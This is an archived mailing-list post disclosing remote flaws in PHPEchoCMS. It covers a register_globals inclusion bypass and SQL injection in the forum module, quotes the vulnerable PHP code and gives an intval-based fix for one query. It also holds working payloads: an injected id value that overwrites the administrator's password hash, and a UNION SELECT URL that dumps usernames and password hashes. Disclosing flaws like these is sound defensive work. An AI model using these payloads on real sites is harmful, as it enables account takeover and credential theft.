<<< Date Index >>>     <<< Thread Index >>>

PHPEchoCMS Multible remote vulnerabilitis



Hello,,

PHPEchoCMS Multible remote vulnerabilitis

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx


fiest thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this ..
modules/files/index.php?BASE_LOAD=1

it will continue .. and other files too

modules/forum/index.php
lines [31-49]
    if (@$_POST['post']=='thread')
    {
        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
        {
                    // Add the thread to the specified section
             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', 
'".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).
              "', '".str_replace("\n", "<br>", 
addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y 
H:i")."', '0')";
              $res = query($ins, 1);
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);
              $res = query($ins, 1);
              $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
              redirect ("index.php?module=forum&show=thread&id=".$nb);
         }
         else
         {
              $content = $mlang['017'];

         }
    }

see
              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

offcourse value here should be md5 hash .. and no brackets so the query will be 
ok :)


lines[138-142]

    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id=".addslashes($_GET['id']), 4);

replace with
    elseif (@$_GET['show']=='thread' && $_GET['id'])
    {
             // Show a thread and its replies (child-threads)

            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id='".intval($_GET['id'])."'", 4);


exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*



# WwW.SoQoR.NeT